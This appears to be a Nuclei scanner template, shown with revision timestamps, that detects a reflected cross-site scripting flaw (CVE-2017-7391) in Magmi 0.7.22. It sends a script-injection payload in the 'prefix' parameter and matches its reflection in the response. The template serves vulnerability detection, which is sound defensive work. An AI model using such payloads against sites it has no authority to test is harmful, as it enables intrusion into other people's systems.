2021-01-02 05:02:50 +00:00
id : CVE-2017-7391
2020-09-03 03:32:29 +00:00
info :
2022-01-25 19:38:53 +00:00
name : Magmi Cross-Site Scripting v.0.7.22
2020-09-03 03:32:29 +00:00
author : pikpikcu
severity : medium
2020-09-03 03:42:43 +00:00
description : A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
2021-08-19 14:25:01 +00:00
reference :
- https://github.com/dweeves/magmi-git/issues/522
- https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
2022-05-17 09:18:12 +00:00
- https://github.com/dweeves/magmi-git/pull/525
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-7391
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2017,magmi,xss
2020-09-03 03:32:29 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"
matchers-condition : and
matchers :
- type : status
status :
- 200
2022-01-26 12:07:19 +00:00
2020-09-03 03:32:29 +00:00
- type : word
2022-01-26 12:07:19 +00:00
part : body
2020-09-03 03:32:29 +00:00
words :
- '"><script>alert(document.domain);</script><'
2020-12-13 19:24:23 +00:00
- type : word
2022-01-26 12:07:19 +00:00
part : header
2020-12-13 19:24:23 +00:00
words :
- "text/html"